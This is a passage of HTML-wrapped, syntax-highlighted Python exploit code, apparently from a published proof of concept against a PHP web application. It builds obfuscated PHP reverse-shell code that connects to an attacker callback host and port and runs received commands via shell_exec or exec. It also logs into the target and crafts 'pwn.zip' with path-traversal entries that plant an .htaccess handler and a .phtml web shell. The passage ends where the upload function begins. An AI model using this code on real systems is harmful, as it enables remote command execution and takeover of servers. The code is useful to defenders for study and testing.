class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;}else if($imARhD(&#8216;shell_exec&#8217;)and!$kqqI(&#8216;shell_exec&#8217;,$dis)){ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-88\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$o=shell_exec($c);}else if($imARhD(&#8216;exec&#8217;)and!$kqqI(&#8216;exec&#8217;,$dis)){ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-89\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$o=array();exec($c,$o);$o=join(chr(10),$o).chr(10);}else{$o=0;}return $o;}} &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-90\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$nofuncs=&#8217;no exec functions&#8217;; &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-91\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;if(is_callable(&#8216;fsockopen&#8217;)and!in_array(&#8216;fsockopen&#8217;,$dis)){ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-92\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$s=@fsockopen(&#8216;tcp:\/\/%s&#8217;,&#8217;%s&#8217;);while($c=fread($s,2048)){$out = &#8221;; &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cb_host<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cb_port<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-93\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;if(substr($c,0,3) == &#8216;cd &#8216;){chdir(substr($c,3,-1)); &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-94\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;}elseif (substr($c,0,4) == &#8216;quit&#8217; || substr($c,0,4) == &#8216;exit&#8217;){break;}else{ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-95\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$out=LcNIcoB(substr($c,0,-1));if($out===false){fwrite($s,$nofuncs); &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-96\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;break;}}fwrite($s,$out);}fclose($s);}else{ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-97\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);@socket_connect($s,&#8217;%s&#8217;,&#8217;%s&#8217;); &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cb_host<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cb_port<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-98\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;@socket_write($s,&#8221;<\/span><span class=\"crayon-v\">socket<\/span><span class=\"crayon-sy\">_<\/span>create<span class=\"crayon-s\">&#8220;);while($c=@socket_read($s,2048)){ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-99\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;$out = &#8221;;if(substr($c,0,3) == &#8216;cd &#8216;){chdir(substr($c,3,-1)); &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-100\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;} else if (substr($c,0,4) == &#8216;quit&#8217; || substr($c,0,4) == &#8216;exit&#8217;) { &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-101\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;break;}else{$out=LcNIcoB(substr($c,0,-1));if($out===false){ &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-102\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;@socket_write($s,$nofuncs);break;}}@socket_write($s,$out,strlen($out)); &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-103\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">phpkode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;}@socket_close($s);} &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-104\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;<span class=\"crayon-ta\">&lt;?php<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-i\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-ta\">?&gt;<\/span>&#8220;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">phpkode<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-105\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-106\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">we_can_login<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-107\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-108\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;logs into the target<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-109\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-110\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(+) getting server token&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-111\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/%s\/login.php&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-112\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">match<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">re<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">search<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;) + &#8220;(.*)&#8221;)&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-113\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">match<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-114\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(+) found the token&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-115\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(+) logging in as %s&#8230;&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">username<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-116\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8216;form_password_hidden&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">_get_hashed_password<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">match<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">group<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;form_login&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;submit&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8216;Login&#8217;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-117\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/%s\/login.php&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">allow_redirects<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-t\">False<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-118\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status_code<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">302<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;index.php&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;Location&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-119\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-120\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-121\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(-) failed to login, check your student password&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-122\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-123\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(-) failed to get the token&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-124\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-125\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-126\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">_build_zip<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-127\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-128\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;builds the zip file.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-129\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;we upload a .htaccess incase the webserver doesnt have <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-130\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;a handler for phtml extensions but typically, they do.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-131\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-132\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">StringIO<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-133\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">z<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">zipfile<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">ZipFile<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;w&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">zipfile<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ZIP_DEFLATED<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-134\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">z<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">writestr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..%shome\/.htaccess&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fp<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;AddType application\/x-httpd-php .phtml&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-135\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">z<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">writestr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..%shome\/si.phtml&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fp<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">_build_php_code<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-136\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">z<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-137\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">handle<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;pwn.zip&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8216;wb&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-138\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">handle<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getvalue<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-139\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">handle<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-140\"><span class=\"crayon-e\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-141\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">we_can_upload_a_shell<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-142\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-143\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;uploads a zip file with php code inside to our target for exploitation<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-144\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" 